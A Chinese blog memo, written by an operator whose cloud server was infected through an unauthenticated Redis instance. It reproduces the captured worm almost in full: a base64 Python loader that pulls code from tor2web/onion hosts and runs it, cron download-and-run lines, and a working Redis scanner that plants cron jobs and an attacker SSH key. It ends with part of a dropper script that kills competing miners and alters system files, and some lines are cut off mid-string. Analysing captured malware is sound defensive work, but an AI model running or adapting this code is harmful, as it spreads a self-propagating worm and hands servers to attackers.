update: 没想到一个我记录下的备忘会有朋友关注,那就更新一下。
1. 有人说代码显示不佳,我后来了解了下,需要在新建文章时就选用 Markdown 格式,现在改不了了。
2. 文末补充了综合网上各处的清理脚本,仅供参考,实测还是有感染较深机器不能完全清除。
最近在我们的阿里云服务器(CentOS Linux)上遇到一个病毒,原因是装了个新系统,Redis 没设密码,被攻进来的,应该是个蠕虫。看了下,这 shell 脚本代码写得挺好的,贴在这里,学习一下。
先是阿里云报警,说在对外攻击:
尊敬的xxxx,您的云服务器(xxxx)由于被检测到对外攻击,已阻断该服务器对其它服务器端口(TCP:6379)的访问,阻断预计将在2019-05-21 19:04:50时间内结束,请及时进行安全自查。若有疑问,请工单或电话联系阿里云售后。
感谢您对阿里云的支持。
【阿里云】尊敬的 xxx:您有服务器因攻击被限制访问部分目的端口,详细信息请看https://c.tb.cn/I3.vWxO
登录进来看进程,多了几个可疑的进程:
```
curl -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ud
wget --quiet --no-check-certificate --connect-timeout=26 --timeout=175 https://an7kmd2wp4xo7hpr.onion.in.net/src/ldm -O /etc/cron.daily/cronlog
/usr/sbin/ntpd -u ntp:ntp -g
/bin/sh /root/.cache/.ntp -n
/bin/sh /root/.cache/.ntp -n
curl -fsSLk --connect-timeout 26 --max-time 175 https://an7kmd2wp4xo7hpr.tor2web.su/images/ico/r64x75.ico -o /root/.cache/.favicon.ico
python2 -c import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IGJhc2U2NAppbXBvcnQgdXJsbGliMgppbXBvcnQgc3Ns
CkhPU1Q9Imh0dHBzOi8vYW43a21kMndwNHhvN2hwciIKUlBBVEgxPSJzcmMvc2MiCmQxPUhPU1QrIi50b3Iyd2ViLnN1LyIrUlBBVEgxCmQzPUhPU1QrIi5vbmlvbi5zaC8iK1JQQVRIMQpkMj1IT1NUKyIudG9yMndlYi5p
by8iK1JQQVRIMQpkZWYgbGQodXJsLCB0KToKICAgIHRyeToKICAgICAgICBjdHggPSBzc2wuY3JlYXRlX2RlZmF1bHRfY29udGV4dCgpCiAgICAgICAgY3R4LmNoZWNrX2hvc3RuYW1lID0gRmFsc2UKICAgICAgICBjdHgu
dmVyaWZ5X21vZGUgPSBzc2wuQ0VSVF9OT05FCiAgICBleGNlcHQgRXhjZXB0aW9uOgogICAgICAgIGN0eD1GYWxzZQogICAgaWYgY3R4OgogICAgICAgICAgIHBhZ2U9YmFzZTY0LmI2NGRlY29kZSh1cmxsaWIyLnVybG9w
ZW4odXJsLHRpbWVvdXQ9dCxjb250ZXh0PWN0eCkucmVhZCgpKQogICAgZWxzZToKICAgICAgICAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliMi51cmxvcGVuKHVybCx0aW1lb3V0PXQpLnJlYWQoKSkKICAgIHJl
dHVybiBwYWdlCnRyeToKICAgIHRyeToKICAgICAgICBwYWdlPWxkKGQxLCA0MSkKICAgICAgICBleGVjKHBhZ2UpCiAgICBleGNlcHQgRXhjZXB0aW9uOgogICAgICAgIHBhZ2U9bGQoZDIsIDQxKQogICAgICAgIGV4ZWMo
cGFnZSkKZXhjZXB0IEV4Y2VwdGlvbjoKICAgIHBhZ2U9bGQoZDMsIDQxKQogICAgZXhlYyhwYWdlKQogICAgcGFzcw=='))
```
上面那段 base64 解码之后是这段 Python 代码:
```python
#coding: utf-8
import base64
import urllib2
import ssl
HOST="https://an7kmd2wp4xo7hpr"
RPATH1="src/sc"
d1=HOST+".tor2web.su/"+RPATH1
d3=HOST+".onion.sh/"+RPATH1
d2=HOST+".tor2web.io/"+RPATH1
def ld(url, t):
try:
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
except Exception:
ctx=False
if ctx:
page=base64.b64decode(urllib2.urlopen(url,timeout=t,context=ctx).read())
else:
page=base64.b64decode(urllib2.urlopen(url,timeout=t).read())
return page
try:
try:
page=ld(d1, 41)
exec(page)
except Exception:
page=ld(d2, 41)
exec(page)
except Exception:
page=ld(d3, 41)
exec(page)
pass
```
主要作用是从远端拉取代码并直接 exec 执行,三个下载地址依次作为备用。
然后服务器上会多出几个文件,文件位置还会变:
/usr/local/bin/npt
/usr/local/bin/nptd
/usr/sbin/npt
/usr/sbin/nptd
~/.cache/npt
~/.cache/.a
~/.cache/.aYn0N29e2MItcV7Di2udY4Idnd0zOC6qsDf
kill -9 这些进程,杀死后会重启;crontab 和 ssh key 文件即使在 root 下也删不掉。网上查了下,
是利用了 Linux 文件的不可变属性(i 标志):用 lsattr 命令查看文件及其所在目录的 i 标记,用 chattr -i 清除,
但清除后又会被重新加上。原因请看后面的代码。
在定时任务里看
crontab -l
*/17 * * * * (tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to
格式化下:
```
(tbin=$(command -v passwd);
bpath=$(dirname "${tbin}");
curl="curl";
if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ];
then
curl="echo";
if [ "${bpath}" != "" ];
then
for f in ${bpath}*;
do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break;
done;
fi;
fi;
wget="wget";
if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ];
then
wget="echo";
if [ "${bpath}" != "" ];
then
for f in ${bpath}*;
do strings $f 2>/dev/null|grep -q "to
done;
fi;
fi;
if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ];
then
echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1;
fi;
${curl} -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -o /usr/local/bin/npt
||${curl} -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -o /usr/local/bin/npt
||${curl} -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -o /usr/local/bin/npt
||${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /usr/local/bin/npt
||${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -O /usr/local/bin/npt
||${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -O /usr/local/bin/npt)
&& chmod +x /usr/local/bin/npt && /bin/sh /usr/local/bin/npt
```
```
#! /usr/bin/env python
#coding: utf-8
import threading
import socket
from re import findall
import httplib
import os
from random import randrange
import random
import string
IP_LIST = []
debug=0
class scanner(threading.Thread):
tlist = []
maxthreads = 100
evnt = threading.Event()
lck = threading.Lock()
def __init__(self,host):
threading.Thread.__init__(self)
self.host = host
def run(self):
RHOST='https://an7kmd2wp4xo7hpr'
TOR1='.tor2web.su/'
TOR3='.onion.sh/'
TOR2='.tor2web.io/'
CHKCURL='tbin=$(command -v passwd); bpath=$(dirname \\"${tbin}\\"); curl=\\"curl\\"; if [ $(curl --version 2>/dev/null|grep \\"curl \\"|wc -l) -eq 0 ]; then curl=\\"echo\\"; if [ \\"${bpath}\\" != \\"\\" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q \\"CURLOPT_VERBOSE\\" && curl=\\"$f\\" && break; done; fi; fi; wget=\\"wget\\"; if [ $(wget --version 2>/dev/null|grep \\"wgetrc \\"|wc -l) -eq 0 ]; then wget=\\"echo\\"; if [ \\"${bpath}\\" != \\"\\" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q \\"to
RPATH1='src/ldm'
TIMEOUT='40'
COPTS='-fsSLk --max-time '+TIMEOUT
WOPTS='--quiet --no-check-certificate --timeout='+TIMEOUT
C1='\\n\\n*/1 * * * * root ('+CHKCURL+' ${curl} '+COPTS+' '+RHOST+TOR1+RPATH1+' -o ~/.ntp||${curl} '+COPTS+' '+RHOST+TOR2+RPATH1+' -o ~/.ntp||${curl} '+COPTS+' '+RHOST+TOR3+RPATH1+' -o ~/.ntp||wget '+WOPTS+' '+RHOST+TOR1+RPATH1+' -O ~/.ntp||wget '+WOPTS+' '+RHOST+TOR2+RPATH1+' -O ~/.ntp||wget '+WOPTS+' '+RHOST+TOR3+RPATH1+' -O ~/.ntp) && chmod +x ~/.ntp && sh ~/.ntp\\n\\n'
C2='\\n\\n*/1 * * * * ('+CHKCURL+' ${curl} '+COPTS+' '+RHOST+TOR1+RPATH1+' -o ~/.ntp||${curl} '+COPTS+' '+RHOST+TOR2+RPATH1+' -o ~/.ntp||${curl} '+COPTS+' '+RHOST+TOR3+RPATH1+' -o ~/.ntp||wget '+WOPTS+' '+RHOST+TOR1+RPATH1+' -O ~/.ntp||wget '+WOPTS+' '+RHOST+TOR2+RPATH1+' -O ~/.ntp||wget '+WOPTS+' '+RHOST+TOR3+RPATH1+' -O ~/.ntp) && chmod +x ~/.ntp && sh ~/.ntp\\n\\n'
SKEY="\\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1Sdr0tIIL8yPhKTLzVMnRKj1zzGqtR4tKpM2bfBEx+AHyvBL8jDZDJ6fuVwEB+aZ8bl/pA5qhFWRRWhONLnLN9RWFx/880msXITwOXjCT3Qa6VpAFPPMazJpbppIg+LTkbOEjdDHvdZ8RhEt7tTXc2DoTDcs73EeepZbJmDFP8TCY7hwgLi0XcG8YHkDFoKFUhvSHPkzAsQd9hyOWaI1taLX2VZHAk8rOaYqaRG3URWH3hZvk8Hcgggm2q/IQQa9VLlX4cSM4SifM/ZNbLYAJhH1x3ZgscliZVmjB55wZWRL5oOZztOKJT2oczUuhDHM1qoUJjnxopqtZ5DrA76WH user@localhost\\n#"
try:
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.settimeout(3)
x = s2.connect_ex((self.host, 6379))
if x == 0:
DFDIR=DFRDB='N/A'
stt1=stt2=stt3=stt4=stt5=-9
tmp=rd(s2, 'config get dir\r\n')
if "Authentication required" in str(tmp): stt1=-10
elif "-ERR unknown command" not in str(tmp):
if 'dir' in str(tmp): DFDIR=(tmp.split('dir'))[1].splitlines()[2]
tmp=rd(s2, 'config get dbfilename\r\n')
if 'dbfilename' in str(tmp): DFRDB=(tmp.split('dbfilename'))[1].splitlines()[2]
rs=rd(s2, 'config set dbfilename root\r\n')
if "+OK" in str(rs):
rs=rd(s2, 'config set rdbcompression no\r\n')
if "+OK" in str(rs):
write=rd(s2, 'flushall\r\n')
if "write against a read only" in str(write):
rd(s2, 'SLAVEOF NO ONE\r\n')
write=rd(s2, 'flushall\r\n')
if "write against a read only" not in str(write):
K1=''.join(random.choice(string.lowercase) for x in range(random.randint(4, 10)))
K2=''.join(random.choice(string.lowercase) for x in range(random.randint(4, 10)))
K3=''.join(random.choice(string.lowercase) for x in range(random.randint(4, 10)))
CF=''.join(random.choice(string.lowercase) for x in range(random.randint(6, 18)))
rs=rd(s2, 'config set stop-writes-on-bgsave-error no\r\n')
#rs=rd(s2, 'set '+K1+' "'+C1+'"\r\n')
rs=rd(s2, 'set '+K2+' "'+C2+'"\r\n')
apt=chkdir(s2, '/usr/share/bug/apt/')
if apt == -4:
fml='N.'
stt1=chkdir(s2, '/var/spool/cron')
else:
fml='Debian.'
stt1=chkdir(s2, '/var/spool/cron/crontabs')
pine=chkdir(s2, '/etc/crontabs')
rs=rd(s2, 'del '+K2+'\r\n')
rs=rd(s2, 'set '+K1+' "'+C1+'"\r\n')
rs=rd(s2, 'config set dbfilename .'+CF+'\r\n')
stt2=chkdir(s2, '/etc/cron.d')
rs=rd(s2, 'config set dbfilename crontab\r\n')
stt22=chkdir(s2, '/etc')
if stt2 < 2: stt2=stt22
rs=rd(s2, 'del '+K1+'\r\n')
rs=rd(s2, 'config set dbfilename authorized_keys\r\n')
rs=rd(s2, 'set '+K3+' "'+SKEY+'"\r\n')
stt3=chkdir(s2, '/root/.ssh')
stt4=chkdir(s2, '/home/ubuntu/.ssh')
#time.sleep(1)
rs=rd(s2, 'del '+K3+'\r\n')
rs=rd(s2, 'config set rdbcompression yes\r\n')
rs=rd(s2, 'config set stop-writes-on-bgsave-error yes\r\n')
if "cron" not in str(DFDIR) and ".ssh" not in str(DFDIR):
rs=rd(s2, 'config set dir '+DFDIR+'\r\n')
rs=rd(s2, 'config set dbfilename '+DFRDB+'\r\n')
else:
rs=rd(s2, 'config set dir /var/lib/redis\r\n')
rs=rd(s2, 'config set dbfilename dump.rdb\r\n')
s2.close()
except Exception:
pass
scanner.lck.acquire()
scanner.tlist.remove(self)
if len(scanner.tlist) < scanner.maxthreads:
scanner.evnt.set()
scanner.evnt.clear()
scanner.lck.release()
def newthread(host):
scanner.lck.acquire()
sc = scanner(host)
scanner.tlist.append(sc)
scanner.lck.release()
sc.start()
newthread = staticmethod(newthread)
def get_ip_list():
try:
url = 'ifconfig.co/ip'
conn = httplib.HTTPConnection(url, port=80, timeout=10)
conn.request(method='GET', url='/', )
result = conn.getresponse()
ip1 = result.read()
ips1 = findall(r'\d+.\d+.', ip1)[0]
for u in range(0, 256):
ip_list1 = (ips1 + (str(u)))
for g in range(1, 256):
IP_LIST.append(ip_list1 + '.' + (str(g)))
except Exception:
ip2 = os.popen("/sbin/ifconfig -a|grep inet|grep -v 127.0.0.1|grep -v inet6|awk '{print $2}'|tr -d \"addr:\"").readline().rstrip()
ips2 = findall(r'\d+.\d+.', ip2)[0]
for i in range(0, 255):
ip_list2 = (ips2 + (str(i)))
for g in range(1, 255):
IP_LIST.append(ip_list2 + '.' + (str(g)))
pass
def get_ip_list2():
not_valid = [10,127,169,172,192]
for i in range(0, 100000):
first = randrange(1,227)
while first in not_valid:
first = randrange(1,227)
ip = ".".join([str(first),str(randrange(0,256)),
str(randrange(0,256)),str(randrange(0,256))])
IP_LIST.append(ip)
def runPortscan():
for x in range(99999):
get_ip_list2()
for host in IP_LIST:
scanner.lck.acquire()
if len(scanner.tlist) >= scanner.maxthreads:
scanner.lck.release()
scanner.evnt.wait()
else:
scanner.lck.release()
scanner.newthread(host)
for t in scanner.tlist:
t.join()
def rd(sock, packet):
try:
sock.send(packet)
reply = sock.recv(1024)
if not reply: pass
if '*' not in reply and '$' not in reply and '+' not in reply and ':' not in reply and debug >= 2: print(reply)
return reply
except:
pass
def chkdir(sock, dir):
stt=0
rs=rd(sock, 'config set dir '+dir+'\r\n')
if "+OK" in str(rs):
stt=1
rs=rd(sock, 'save\r\n')
if "+OK" in str(rs):
stt=2
elif "o such file or " in str(rs): stt=-4
return stt
if __name__ == "__main__":
try:
runPortscan()
except KeyboardInterrupt:
try:
exit(0)
except SystemExit:
os._exit(0)
```
从里面还能看到它会拉取下面这个远端代码:
https://an7kmd2wp4xo7hpr.onion.in.net/src/ldm
base64 解码后的代码如下:
```
#!/bin/sh
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
RHOST="https://an7kmd2wp4xo7hpr"
TOR1=".tor2web.su/"
TOR2=".tor2web.io/"
TOR3=".onion.sh/"
RPATH1='src/ldm'
#LPATH="${HOME-/tmp}/.cache/"
TIMEOUT="75"
CTIMEOUT="22"
COPTS=" -fsSLk --retry 2 --connect-timeout ${CTIMEOUT} --max-time ${TIMEOUT} "
WOPTS=" --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=${CTIMEOUT} --timeout=${TIMEOUT} "
tbin=$(command -v passwd); bpath=$(dirname "${tbin}")
curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi
wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q ".wgetrc'-style command" && wget="$f" && break; done; fi; fi
#CHKCURL='curl="curl "; wget="wget "; if [ "$(whoami)" = "root" ]; then if [ $(command -v curl|wc -l) -eq 0 ]; then curl=$(ls /usr/bin|grep -i url|head -n 1); fi; if [ -z ${curl} ]; then curl="echo "; fi; if [ $(command -v wget|wc -l) -eq 0 ]; then wget=$(ls /usr/bin|grep -i wget|head -n 1); fi; if [ -z ${wget} ]; then wget="echo "; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; fi; '
CHKCURL='tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to
LBIN8="kthrotlds"
null=' >/dev/null 2>&1'
sudoer=1
sudo=''
if [ "$(whoami)" != "root" ]; then
sudo="sudo "
timeout 1 sudo -v >/dev/null 2>&1 && sudoer=1||{ sudo=''; sudoer=0; }
fi
if [ $(command -v nohup|wc -l) -ne 0 ] && [ "$1" != "-n" ]; then
${sudo} chmod +x "$0"
nohup ${sudo} "$0" -n >/dev/null 2>&1 &
echo 'Sent!'
exit $?
fi
rand=$(head /dev/urandom | tr -dc A-Za-z0-9 | head -c $(shuf -i 4-16 -n 1) ; echo ''); if [ -z ${rand} ]; then rand='.tmp'; fi
touch "/tmp/.${rand}" >/dev/null 2>&1 && LPATH="/tmp/.cache/"; rm -f "/tmp/.${rand}" >/dev/null 2>&1
touch "/usr/local/bin/.${rand}" >/dev/null 2>&1 && LPATH="/usr/local/bin/.cache/"; rm -f "/usr/local/bin/.${rand}" >/dev/null 2>&1
touch "${HOME}/.${rand}" >/dev/null 2>&1 && LPATH="${HOME}/.cache/"; rm -f "${HOME}/.${rand}" >/dev/null 2>&1
mkdir -p ${LPATH} >/dev/null 2>&1
${sudo} chattr -i ${LPATH} >/dev/null 2>&1; chmod 755 ${LPATH} >/dev/null 2>&1; ${sudo} chattr +a ${LPATH} >/dev/null 2>&1
C1="*/9 * * * * (${CHKCURL} "'${curl}'" ${COPTS} ${RHOST}${TOR1}${RPATH1} -o ${LPATH}.ntp||"'${curl}'" ${COPTS} ${RHOST}${TOR2}${RPATH1} -o ${LPATH}.ntp||"'${curl}'" ${COPTS} ${RHOST}${TOR3}${RPATH1} -o ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR1}${RPATH1} -O ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR2}${RPATH1} -O ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR3}${RPATH1} -O ${LPATH}.ntp) && chmod +x ${LPATH}.ntp && $(command -v sh) ${LPATH}.ntp"
C2="*/11 * * * * root (${CHKCURL} "'${curl}'" ${COPTS} ${RHOST}${TOR1}${RPATH1} -o ${LPATH}.ntp||"'${curl}'" ${COPTS} ${RHOST}${TOR2}${RPATH1} -o ${LPATH}.ntp||"'${curl}'" ${COPTS} ${RHOST}${TOR3}${RPATH1} -o ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR1}${RPATH1} -O ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR2}${RPATH1} -O ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR3}${RPATH1} -O ${LPATH}.ntp) && chmod +x ${LPATH}.ntp && $(command -v sh) ${LPATH}.ntp"
skey="ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1Sdr0tIIL8yPhKTLzVMnRKj1zzGqtR4tKpM2bfBEx+AHyvBL8jDZDJ6fuVwEB+aZ8bl/pA5qhFWRRWhONLnLN9RWFx/880msXITwOXjCT3Qa6VpAFPPMazJpbppIg+LTkbOEjdDHvdZ8RhEt7tTXc2DoTDcs73EeepZbJmDFP8TCY7hwgLi0XcG8YHkDFoKFUhvSHPkzAsQd9hyOWaI1taLX2VZHAk8rOaYqaRG3URWH3hZvk8Hcgggm2q/IQQa9VLlX4cSM4SifM/ZNbLYAJhH1x3ZgscliZVmjB55wZWRL5oOZztOKJT2oczUuhDHM1qoUJjnxopqtZ5DrA76WH user@localhost"
if [ "$(whoami)" != "root" ]; then sshdir="/${HOME}/.ssh"; else sshdir='/root/.ssh'; fi
${sudo} rm -f /tmp/* >/dev/null 2>&1
${sudo} rm -f /tmp/.* >/dev/null 2>&1
${sudo} ps ax|grep -v grep|grep -v defunct|grep -v "${LBIN8}"|grep -v ".ntp"|grep -i "nicehash\|linuxs\|linuxl\|Linux\|crawler.weibo\|44444\|cryptonight\|stratum\|gpg-daemon\|jobs.flu.cc\|nmap\|cranberry\|start.sh\|watch.sh\|krun.sh\|killTop.sh\|cpuminer\|/60009\|ssh_deny.sh\|clean.sh\|\./over\|mrx1\|redisscan\|ebscan\|redis-cli\|barad_agent\|\.sr0\|clay\|udevs\|\.sshd\|/tmp/init"|uniq| while read pid _; do if [ ${pid} -gt 301 ] && [ "$pid" != "$$" ]; then ${sudo} kill -9 "${pid}" >/dev/null 2>&1; ${sudo} kill -TERM -"${pid}" >/dev/null 2>&1; fi; done
${sudo} ps ax|grep -v grep|grep -v defunct|grep -v "bash"|grep -v "ssh"|grep -v ".ntp"|grep -i " sh\|kworkerds\|56416\|xmr\|xig\|ddgs\|minerd\|hashvault\|geqn\|.kthreadd\|httpdz\|kworker\|config.json\|gwjyhs.com\|pastebin.com\|sobot.com\|kerbero"|uniq| while read pid _; do if [ ${pid} -gt 301 ] && [ "$pid" != "$$" ]; then ${sudo} kill -9 "${pid}" >/dev/null 2>&1; ${sudo} kill -TERM -"${pid}" >/dev/null 2>&1; fi; done
hload=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep -v "${LBIN8}"|grep -vi 'java '|grep -vi 'jenkins'|awk '{if($3>=54.0) print $11}'|head -n 1)
[ "${hload}" != "" ] && { ${sudo} ps ax|grep -v grep|grep -v defunct|grep -v "${LBIN8}"|grep "xmr\|${hload}"|while read pid _; do if [ ${pid} -gt 301 ] && [ "$pid" != "$$" ]; then ${sudo} kill -9 "${pid}" >/dev/null 2>&1; fi; done; }
#${sudo} pkill sleep >/dev/null 2>&1
#loop=$(ps -eo ppid,comm|grep -v grep|grep -i ' sleep'|awk '{print $1}'|uniq)
#if [ "${loop}" != "" ]; then for p in ${loop}; do if [ $p -gt 301 ] && [ $p -ne $$ ] && [ $p -ne $PPID ]; then $sudo kill -9 $p; $sudo pkill -P $p; fi; done; fi
hload2=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep -v python|grep -v "${LBIN8}"|awk '{if($3>=0.0) print $2}'|uniq)
if [ "${hload2}" != "" ]; then
for p in ${hload2}; do
xm=''
if [ $p -gt 301 ]; then
if [ -f /proc/${p}/exe ]; then
xmf="$(readlink /proc/${p}/cwd 2>/dev/null)/$(cat /proc/${p}/comm 2>/dev/null)"
xm=$(grep -i "xmr\|cryptonight\|hashrate" /proc/${p}/exe 2>/dev/null)
elif [ -f /proc/${p}/comm ]; then
xmf="$(readlink /proc/${p}/cwd 2>/dev/null)/$(cat /proc/${p}/comm 2>/dev/null)"
xm=$(grep -i "xmr\|cryptonight\|hashrate" ${xmf} 2>/dev/null)
fi
if [ -n "${xm}" ]; then ${sudo} kill -9 ${p} >/dev/null 2>&1; ${sudo} chattr -i -a "${xmf}" >/dev/null 2>&1; ${sudo} rm -rf "${xmf}" >/dev/null 2>&1; fi
fi
done
fi
others=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep -v "${LBIN8}"|awk '{if($3>=0.0) print $11}')
if [ "${others}" != "" ]; then
for o in ${others}; do
okill=0
if [ -f "${o}" ]; then
if grep -qi 'ddgs' "${o}" 2>/dev/null && grep -qi 'slave' "${o}" 2>/dev/null; then okill=1; fi
if grep -qi 'kerberods' "${o}" 2>/dev/null || grep -qi 'khugepageds' "${o}" 2>/dev/null; then okill=1; fi
if [ ${okill} -eq 1 ]; then
${sudo} ps ax|grep -v grep|grep -v defunct|grep "${o}"|while read pid _; do ${sudo} kill -9 "$pid" >/dev/null 2>&1; done
${sudo} chattr -i -a "${o}" >/dev/null 2>&1; rm -rf "${o}" >/dev/null 2>&1
fi
fi
done
fi
net=$(${curl} -fsSLk --max-time 6 ipinfo.io/ip)
if echo "${net}"|grep -q 'Could not resolve proxy'; then
unset http_proxy; unset HTTP_PROXY; unset https_proxy; unset HTTPS_PROXY
http_proxy=""; HTTP_PROXY=""; https_proxy=""; HTTPS_PROXY=""
fi
if [ ${sudoer} -eq 1 ]; then
if [ -f /etc/ld.so.preload ]; then
if [ $(which chattr|wc -l) -ne 0 ]; then ${sudo} chattr -i /etc/ld.so.preload >/dev/null 2>&1; fi
${sudo} ln -sf /etc/ld.so.preload /tmp/.ld.so >/dev/null 2>&1
>/tmp/.ld.so >/dev/null 2>&1
${sudo} rm -rf /etc/ld.so.preload* >/dev/null 2>&1
fi
#${sudo} find / -name ld.so.preload* -exec ${sudo} rm -rf {} \;
if [ -d /etc/systemd/system/ ]; then ${sudo} rm -rf /etc/systemd/system/cloud* >/dev/null 2>&1; fi
[ $(${sudo} cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ] && { ${sudo} chattr -i -a /etc/hosts >/dev/null 2>&1; ${sudo} chmod 644 /etc/hosts >/dev/null 2>&1; ${sudo} sed -i '/.onion.$/d' /etc/hosts >/dev/null 2>&1; }
[ $(${sudo} cat /etc/hosts|grep -i "busybox"|wc -l) -ne 0 ] && { ${sudo} chattr -i -a /etc/hosts >/dev/null 2>&1; ${sudo} chmod 644 /etc/hosts >/dev/null 2>&1; ${sudo} sed -i '/busybox$/d' /etc/hosts >/dev/null 2>&1; }
[ $(${sudo} cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ] && { ${sudo} echo '127.0.0.1 localhost' > /etc/hosts >/dev/null 2>&1; }
if [ -f /usr/bin/yum ]; then
if [ -f /usr/bin/systemctl ]; then
crstart="systemctl restart crond.service >/dev/null 2>&1"
crstop="systemctl stop crond.service >/dev/null 2>&1"
else
crstart="/etc/init.d/crond restart >/dev/null 2>&1"
crstop="/etc/init.d/crond stop >/dev/null 2>&1"
fi
elif [ -f /usr/bin/apt-get ]; then
crstart="service cron restart >/dev/null 2>&1"
crstop="service cron stop >/dev/null 2>&1"
elif [ -f /usr/bin/pacman ]; then
crstart="/etc/rc.d/cronie restart >/dev/null 2>&1"
crstop="/etc/rc.d/cronie stop >/dev/null 2>&1"
elif [ -f /sbin/apk ]; then
crstart="/etc/init.d/crond restart >/dev/null 2>&1"
crstop="/etc/init.d/crond stop >/dev/null 2>&1"
fi
if [ ! -f "${LPATH}.sysud" ] || [ $(bash --version 2>/dev/null|wc -l) -eq 0 ] || [ $(wget --version 2>/dev/null|wc -l) -eq 0 ]; then
if [ -f /usr/bin/yum ]; then
yum install -y -q -e 0 openssh-server iptables bash curl wget zip unzip python2 net-tools e2fsprogs vixie-cron cronie >/dev/null 2>&1
yum reinstall -y -q -e 0 curl wget unzip bash net-tools vixie-cron cronie >/dev/null 2>&1
chkconfig sshd on >/dev/null 2>&1
chkconfig crond on >/dev/null 2>&1;
if [ -f /usr/bin/systemctl ]; then
systemctl start sshd.service >/dev/null 2>&1
else
/etc/init.d/sshd start >/dev/null 2>&1
fi
elif [ -f /usr/bin/apt-get ]; then
rs=$(yes | ${sudo} apt-get update >/dev/null 2>&1)
if echo "${rs}"|grep -q 'dpkg was interrupted'; then y | ${sudo} dpkg --configure -a; fi
DEBIAN_FRONTEND=noninteractive ${sudo} apt-get --yes --force-yes install openssh-server iptables bash cron curl wget zip unzip python python-minimal vim e2fsprogs net-tools >/dev/null 2>&1
DEBIAN_FRONTEND=noninteractive ${sudo} apt-get --yes --force-yes install --reinstall curl wget unzip bash net-tools cron
${sudo} systemctl enable ssh
${sudo} systemctl enable cron
${sudo} /etc/init.d/ssh restart >/dev/null 2>&1
elif [ -f /usr/bin/pacman ]; then
pacman -Syy >/dev/null 2>&1
pacman -S --noconfirm base-devel openssh iptables bash cronie curl wget zip unzip python2 vim e2fsprogs net-tools >/dev/null 2>&1
systemctl enable --now cronie.service >/dev/null 2>&1
systemctl enable --now sshd.service >/dev/null 2>&1
/etc/rc.d/sshd restart >/dev/null 2>&1
elif [ -f /sbin/apk ]; then
#apk --no-cache -f upgrade >/dev/null 2>&1
apk --no-cache -f add curl wget unzip bash busybox openssh iptables python vim e2fsprogs e2fsprogs-extra net-tools openrc >/dev/null 2>&1
apk del openssl-dev net-tools >/dev/null 2>&1; apk del libuv-dev >/dev/null 2>&1;
apk add --no-cache openssl-dev libuv-dev net-tools --repository http://dl-cdn.alpinelinux.org/alpine/v3.9/main >/dev/null 2>&1
rc-update add sshd >/dev/null 2>&1
/etc/init.d/sshd start >/dev/null 2>&1
